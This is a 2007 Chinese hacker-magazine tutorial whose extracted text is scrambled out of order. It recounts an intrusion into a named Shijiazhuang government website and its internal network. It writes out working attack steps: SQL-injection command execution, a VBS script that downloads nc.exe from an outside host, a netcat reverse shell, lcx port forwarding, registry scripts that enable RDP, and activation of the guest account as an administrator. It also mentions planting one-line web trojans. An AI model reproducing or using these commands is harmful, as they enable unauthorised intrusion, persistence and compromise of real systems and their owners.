经典重现看菜鸟如何入侵内网

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

这个时候我们要做的事就是开启3389端口。 Windows 2003开启3389的方法很简单,并且不用重 启机器。我们只要输入以下的脚本就可以了。
echo Windows Registry Editor Version 5.00 >3389.reg echo. >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon trolSet\Control\Terminal Server] >>3389.reg echo "fDenyTSConnections"=dword:00000000 >>3389. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >> 3389.reg echo "PortNumber"=dword:00000d3d >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 3389.reg echo "PortNumber"=dword:00000d3d >>3389.reg
漏 EXPLOIT ATTACK & DEFENCE 〉栏目编辑 〉脚本小子 〉scr iptsboy@hacker.com.cn



适合读者:入侵爱好者 前置知识:无
经典重现看菜鸟如何入侵内网
文/图 cnbird[H.U.C]河北泊头杨宁
这次我要带给大家的是如何通过一次SQL注入 点到最后的入侵内网,同时给内网的机器开3389的精 彩教程,希望大家能够喜欢。相信黑防里面高手如云, 对于入侵内网是小菜一碟,但是毕竟我也属于菜鸟 之列,所以这篇文章只是写给和我一样的菜鸟的,高 手就请略过吧。废话不多说,我们直接进入正题。
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"): xPost.Open ^"GET^",^"http://www.bttmjx.com/nc.exe^",0: xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet. Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost. responseBody):sGet.SaveToFile ^"c:\nc.exe^",2 >c:\down. vbs
依次在NBSI里面输入以上命令,成功执行后,结 果如图7所示,明明终端端口是3389啊。忽然有个念 头在我脑海里闪过,难道这就是传说中的内网机 器?赶紧输入“ipconfig –all”查看,结果如图8所示, 果然是内网,难怪如此!
图8 首先上传加密版的nc.exe和lcx.exe。怎么上传 呢?其实NBSI自带有上传功能,但是我感觉太慢了, 它是先把EXE文件转化成VBS格式的,上传成功后再 利用Debug来还原,操作麻烦,我不喜欢,还是自己写 一个脚本直接下载吧,脚本内容如下。
图6
Echo Dim ReadComputerName >>port.vbs Echo Set ReadComputerName=WScript. CreateObject ("WScript.Shell") >>port.vbs Echo Dim TSName,TSRegPath >>port.vbs Echo TSRegPath="HKLM\System\CurrentControlSet\Con trol\Terminal Server\WinStations\RDP-Tcp\PortNumber" >> port.vbs Echo TSName=ReadComputerName.RegRead(TSRegPath) >>port.vbs Echo WScript.Echo("TermService port is:"^&TSName) >>port.vbs Cscript port.vbs
这段代码的意思是利用XMLHTTP脚本来下载文 件。我把nc.exe放到了我公司的网站上,希望大家不 要来黑我公司的网站啊!直接在NBSI中输入,如图9 所示,不用管这个弹出的窗口,因为是用echo命令来 执行的,肯定不会有回显的,我们下次执行命令的时 候只要把回显打上勾就可以了。成功执行命令后,再 执行“cscript down.vbs”就能很顺利地下载nc.exe和 lcx.exe了,如图10所示,下载成功。
图4 图1
图2
图3
24
ww w.h acke r.c om.cn
防 黑客 线 2007.08
HACKER DEFENCE
图5
曲折之路
有了能执行命令的sa权限,我们还愁什么事干 不成呢?执行“netstat –an”看看有没有开放3389端 口,结果确认开放了3389。那剩下的事就好办了,我 们直接加个用户和密码就可以了,依次在NBSI中输入 “net user guest /active”、“net user guest guest”、“net localgroup administrators guest /add”。添加成功之 后,我以为到这里入侵就会结束了呢。打开3389终端 连接器,兴高采烈地输入IP地址,结果如图6所示,气 死我了,明明开了3389,为什么不能连接上呢?难道
发现SQL注入点
SQL注入自从2001年被国外的某个牛人发现以 后,多少服务器死在了它的手下早已无从统计。2003
年SQL注入正式在国内风靡,虽然过去4年了,但是 SQL注入依然是拿到服务器权限的一种重要手段。
某日,我正在Google徘徊的时候,发现一目标— —石家庄政府网www.sjz.gov.cn,想来政府网站的 主机配置应该不错的,就拿它作为我们今天的测试 目标吧。大概浏览了一下网站,貌似这个网站使用的 是自由动力整站程序,试了自由动力的几个漏洞都 没有成功。
到了这里,接下来的事情就是进行Cain嗅探监视 网络数据包,以便渗透其他内部机器了。Cain就让它 去运行吧,好不容易连接上,就把X-Scan也安装上, 扫扫内网看看有什么有漏洞的机器没有。结果让我 大吃一惊,基本上每台机器都有漏洞,而且都是可以 直接拿到系统权限的,如图15所示。我用MS06-040入 侵了几台机器,用MS SQL弱口令也搞定了几台。到这 里我就不详细地讲解了,毕竟是石家庄政府网,我可 不想搞得太过分了,帮忙把网站存在的SQL注入漏洞 补上,这样服务器就安全多了。
然后执行“regedit /s 3389.reg”就OK了,执行的 结果如图12所示,成功开放了3389端口,此时就可以 用lcx.exe来进行终端的连接了。
图10 接下来的事情应该就简单了吧?在本地的CMD 中输入“nc vv l p 246”,意思是监听本地的246端 口,然后在NBSI中输入“nc –e cmd.exe 本机IP 246” 就可以了。相信nc.exe的强大功能大家都会了,我就 不多说了。端口反弹成功后,我们要做的事就是用 lcx.exe来进行3389端口的连接了。
26
ww w.h acke r.c om.cn
防 黑客 线 2007.08
HACKER DEFENCE
漏 EXPLOIT ATTACK & DEFENCE 〉栏目编辑 〉脚本小子 〉scr iptsboy@hacker.com.cn



图13
图14
图15 最后我再罗嗦一下,如何在拿到sa权限或者是溢 出以后开对方的3389,网上教程很多,但我认为不是 很经典,下面就给大家介绍一种经典的方法,150% 次次成功。这里我就以一个内网的sa弱口令来详细讲 解如何开启Windows 2000 Server的3389端口。 如图16所示,172.16.1.4这台机器的3389端口没 有开放,存在sa弱口令漏洞,那么我们就可以在MS SQL弱口令利用工具中输入以下脚本。
漏 EXPLOIT ATTACK & DEFENCE 〉栏目编辑 〉脚本小子 〉scr iptsboy@hacker.com.cn



修改端口了?或许吧,没准管理员是个高手呢。那怎 么才能知道机器开放的终端端口为多少呢?这里我 给大家提供一个脚本。
利用反弹连接3389。这种反弹连接最经典的莫过于 lcx.exe了,下面我就来详细地讲解一下步骤。
图1所示。打开网站一看,原来是河北政府采购网,进 入注入点后,让我大跌眼睛,竟然是sa的权限,如图2 所示。不过我们今天的目标不是它,就放到以后再说 吧,我们继续回到石家庄政府网站。当我来到石家庄 政府在线访问系统的时候,啊D找到了两个注入点, 如图3所示。这个系统的IP地址为221.194.12.19,而 www.sjz.gov.cn的IP地址为221.194.12.36,虽然不 是一个IP地址,但我们可以得到一个重要的情报,就 是它们在一个网段内。这个时候我的思路就清晰了 起来,我们可以先入侵分站,然后通过嗅探的方法得 到我们需要的信息。
那就请出啊D看看有没有注入点吧,结果没有发 现www.sjz.gov.cn的漏洞,但却有了意外的收获,如
HACKER DEFENCE
ww w.h acke r.c om.cn
防 2007.08 黑客 线
23



防 EXPLOIT ATTACK & DEFENCE 〉栏目编辑 〉脚本小子 〉scr iptsboy@hacker.com.cn
echo "Enabled"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microso ft\Windows NT\CurrentVersion\Winlogon] >>3389.reg echo "ShutdownWithoutLogon"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies \Microsoft\Windows\Installer] >>3389.reg echo "EnableAdminTSRemote"=dword:00000001 >>3389. reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Control\Terminal Server] >>3389.reg echo "TSEnabled"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentContr olSet\Services\TermDD] >>3389.reg echo "Start"=dword:00000002 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Services\TermService] >>3389.reg echo "Start"=dword:00000002 >>3389.reg echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Togg le] >>3389.reg echo "Hotkey"="1" >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >> 3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg
有了思路就好办了,我们先看看刚才发现的注 入点是什么类型的注入吧。结果总是那么的让人出 乎意料,居然又是sa权限,如图4所示。先看看我们能 不能执行命令吧,结果啊D中不能执行,那就换成NBSI 试试吧,如图5所示,出现了我们想要的结果了。因为 能直接执行命令,我们就不用上传WebShell了,等拿 到3389系统权限以后,再把一句话木马插入到某个 文件中,这样就有了和PHP一句话插入所有PHP文件 一样的做法了。具体的操作就是利用WebShell批量挂 马功能就行了,这里我就不多罗嗦了。
图16
echo Windows Registry Editor Version 5.00 >3389.reg echo. >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microso ft\Windows\CurrentVersion\netcache] >>3389.reg
峰回路转 在反弹回来的Shell中输入一些常用的命令,确认 服务器操作系统是Windows 2003。我们在开始的时 候发现这台主机开放了终端服务器,但在利用lcx. exe转发过程中最终确认是3389的端口没有开放,所 以导致连接不成功,如图11所示。
图11
图12 成功连接内网
开放3389以后,我们用lcx.exe来进行连接。先在 本地输入“C:\Documents and Settings\new\桌面> lcx -listen 51 3333”,意思就是开个3333端口进行 准备连接,因为我的3389端口已经开放了。下面在服 务器上执行,结果如图13所示,已经有反应了。我们 连接本地的3333端口看一下,终于成功了。不过别太 高兴了,我们现在还没有账号呢!打开NBSI,直接将 Guest账户激活,然后加入administrators组就可以了。如 图14所示,我们终于成功登录3389了!
图7
陷入困境 知道了是内网的机器又该怎么办呢?思路是很 简单,就是利用执行命令反弹到本地的机器上,然后
图9
HACKER DEFENCE
ww w.h acke r.c om.cn
防 2007.08 黑客 线
25
Hale Waihona Puke Baidu 漏


防 EXPLOIT ATTACK & DEFENCE 〉栏目编辑 〉脚本小子 〉scr iptsboy@hacker.com.cn
相关文档
最新文档